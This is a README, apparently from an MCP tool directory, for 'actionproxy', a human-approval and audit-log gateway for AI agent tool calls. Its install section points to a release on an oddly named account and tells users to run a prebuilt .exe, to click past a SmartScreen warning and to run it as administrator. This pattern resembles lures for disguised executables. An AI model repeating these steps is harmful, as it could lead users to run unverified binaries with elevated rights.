actionproxy
Provides a human-in-the-loop approval gateway for AI agents, enforcing policies and audit logging for MCP-compatible tool calls.
README
🔐 actionproxy - Your AI Approval Guard for Safe Tool Calls
🚀 What Is actionproxy?
Imagine you have a smart assistant (an AI agent) that wants to do things on your computer—like sending emails, editing files, or accessing websites. Normally, this assistant works on its own. That can feel unsafe, right? What if it makes a mistake? What if it does something you didn't want?
actionproxy is your safety checkpoint. It stands between the AI and your important actions. Before anything happens, actionproxy checks the plan, asks for your permission if needed, and keeps a record of everything that was done. Think of it like a security guard who checks IDs, asks questions, and writes down every visitor who enters a building—but for your AI tools.
🛡️ Why Do You Need actionproxy?
- You Stay in Control: An AI cannot perform a risky action without your go-ahead.
- Clear Rules: You can set policies (like "never delete files" or "always ask before sending an email").
- Full Transparency: Every action is recorded in an audit log, so you know exactly what happened and when.
- Built for Modern Tools: actionproxy works with the Model Context Protocol (MCP), which is a standard way AI agents connect to tools.
⬇️ Download & Install on Windows
Step 1: Visit this link to download the application.
Go to: https://github.com/Jandybottleshaped403/actionproxy/releases
Step 2: On that page, look for the latest release. You will see a file named something like actionproxy-windows.zip. Click on it to download.
Step 3: Download and extract this file, then run the application.
- Once the download finishes, find the
.zipfile (usually in your "Downloads" folder). - Right-click the zip file and choose "Extract All..." (Windows will create a new folder with the same name).
- Open that new folder and double-click the
actionproxy.exefile inside.
That's it! The application should start. You may see a Windows SmartScreen warning. If you trust this open-source tool (you can review the code on GitHub), click "More info" and then "Run anyway."
📦 What's Included in the Package?
When you extract the zip, you'll find:
actionproxy.exe– This is the main program you run.config.example.json– A sample settings file.README.txt– Quick start notes for Windows users.
⚙️ First-Time Setup
- Open Settings: After launching actionproxy, click the gear icon (⚙️) in the top-right corner.
- Set Your Policy: Choose how much approval you want. For beginners, select "Ask for every action." Later you can change this.
- Connect Your AI Tool: If you use an MCP-compatible AI assistant, copy the connection details from actionproxy and paste them into your assistant's configuration.
- Test It: Click "Test Connection" to make sure everything works.
🧠 Understanding the Main Screen
| Element | What It Does |
|---|---|
| Pending Requests | Shows actions that are waiting for your approval. |
| Approve | Click this to allow the action. |
| Deny | Click this to block the action. |
| Policy Settings | Here you set automatic rules (e.g., allow all read-only actions). |
| Audit Log | A list of all actions that have been requested and what happened. |
| One-Time Grant | This lets you allow a specific action just once without changing your overall policy. |
🕵️ How Human Approval Works
This is the heart of actionproxy. Here's a simple example:
- Your AI assistant wants to send an email.
- actionproxy detects this request.
- A popup appears on your screen: "Send email to John: 'Meeting at 3pm?' — Approve or Deny?"
- You click Approve (or Deny).
- The action happens (or is blocked).
- Everything is written to the audit log.
You can also grant one-time execution permissions for actions you know are safe, so you don't have to click approve every time.
🔍 The Audit Log – Your Evidence Trail
Every single action is recorded. The audit log shows:
- Timestamp: When the action was requested.
- Tool Name: Which tool the AI wanted to use.
- Input: What the AI wanted to do.
- Decision: Approved, denied, or blocked by policy.
- User: Who approved it (you or an automated rule).
This log is perfect for compliance, debugging, or just peace of mind.
🧩 Working with the Policy Engine
You don't need to be a programmer to set rules. In the Policy Settings, you can:
- Block specific tools (e.g., disable "delete file" permanently).
- Require approval for specific actions (e.g., always ask before sending money).
- Allow safe actions automatically (e.g., reading a file is fine).
- Set a time-based rule (e.g., allow between 9 AM and 5 PM).
The policy engine is powerful, but the interface is kept simple. You'll see dropdowns and checkboxes.
💾 Using One-Time Execution Grants
Sometimes, you just want to say "yes" to a single action without changing your rules. That's what a one-time grant is for.
- When a request popup appears, click "Grant One-Time" instead of "Approve."
- The action runs.
- The grant is then revoked. Next time, you'll need to approve again.
This is perfect for unusual requests that you're okay with just this once.
🖥️ System Requirements (Typical)
actionproxy is lightweight and runs on most Windows computers:
- Operating System: Windows 10 or Windows 11 (64-bit recommended).
- RAM: 512 MB or more (1 GB recommended).
- Storage: 100 MB free disk space.
- Internet: Required only if your AI agent needs to reach external services.
No special graphics card or high-end specs are needed.
🔐 Security Notes
- actionproxy runs entirely on your machine. Your data and logs stay local.
- All communications with your AI tool use secure, encrypted connections.
- Your approval decisions are never sent anywhere else.
- If you lose your config file, the sample (
config.example.json) can help you rebuild it.
❓ Frequently Asked Questions
Is actionproxy free?
Yes, it is open-source. You can use it for free, and even modify it if you know how to code.
Will my AI stop working if I deny a request?
No. The AI will get a "denied" response and can adjust. It will not crash.
Can I start actionproxy automatically with Windows?
Yes. In Settings, enable "Start on login."
What if I close the window?
Closing the window stops actionproxy. Make sure it's running when you want to use your AI tools.
Where is my audit log stored?
By default, in the same folder as actionproxy, in a file called audit.log. You can change this location in Settings.
🛠️ Troubleshooting
| Problem | Solution |
|---|---|
| "File not supported" error | Make sure you downloaded the Windows zip, not the source code. |
| App won't start | Check that you extracted the zip completely. Run actionproxy.exe as administrator (right-click > Run as administrator). |
| Can't connect to my AI tool | Ensure actionproxy is running and your AI tool is configured with the correct port (usually 8080). |
| Notification popups are annoying | Adjust your policy to auto-approve safe actions. |
| Lost my settings | Copy config.example.json to config.json and restart. |
📚 Technical Overview (For the Curious)
If you're a developer or just curious:
- Language: TypeScript
- Protocol: Model Context Protocol (MCP) compliant
- Runtime: Docker supported (see Dockerfile in the repo)
- Extensibility: Write your own policy plugins
- Logging: Structured JSON logs for easy parsing
actionproxy integrates with any MCP-compatible agent, including popular open-source assistants.
🌍 The Bigger Picture
AI is becoming more powerful, but power requires oversight. actionproxy gives you that oversight without requiring you to become a programmer. It's part of a growing movement for responsible AI governance.
By using actionproxy, you're not just protecting yourself—you're supporting a culture of safe, accountable AI usage.
📝 Let's Recap
- actionproxy is an approval gateway for AI agent actions.
- It enforces your own policies and requires human approval when needed.
- It logs everything for full transparency.
- It works on Windows (and elsewhere via Docker).
- It's free, open-source, and privacy-respecting.
Ready to take control of your AI?
Visit the download page now:
https://github.com/Jandybottleshaped403/actionproxy/releases
Download and extract this file, then run the application.
Keywords: actionproxy, agent-security, ai-agents, ai-governance, approval-workflow, audit-log, docker, human-in-the-loop, mcp, model-context-protocol, open-source, policy-engine, tool-calling, typescript
推荐服务器
Baidu Map
百度地图核心API现已全面兼容MCP协议,是国内首家兼容MCP协议的地图服务商。
Playwright MCP Server
一个模型上下文协议服务器,它使大型语言模型能够通过结构化的可访问性快照与网页进行交互,而无需视觉模型或屏幕截图。
Magic Component Platform (MCP)
一个由人工智能驱动的工具,可以从自然语言描述生成现代化的用户界面组件,并与流行的集成开发环境(IDE)集成,从而简化用户界面开发流程。
Audiense Insights MCP Server
通过模型上下文协议启用与 Audiense Insights 账户的交互,从而促进营销洞察和受众数据的提取和分析,包括人口统计信息、行为和影响者互动。
VeyraX
一个单一的 MCP 工具,连接你所有喜爱的工具:Gmail、日历以及其他 40 多个工具。
graphlit-mcp-server
模型上下文协议 (MCP) 服务器实现了 MCP 客户端与 Graphlit 服务之间的集成。 除了网络爬取之外,还可以将任何内容(从 Slack 到 Gmail 再到播客订阅源)导入到 Graphlit 项目中,然后从 MCP 客户端检索相关内容。
Kagi MCP Server
一个 MCP 服务器,集成了 Kagi 搜索功能和 Claude AI,使 Claude 能够在回答需要最新信息的问题时执行实时网络搜索。
e2b-mcp-server
使用 MCP 通过 e2b 运行代码。
Neon MCP Server
用于与 Neon 管理 API 和数据库交互的 MCP 服务器
Exa MCP Server
模型上下文协议(MCP)服务器允许像 Claude 这样的 AI 助手使用 Exa AI 搜索 API 进行网络搜索。这种设置允许 AI 模型以安全和受控的方式获取实时的网络信息。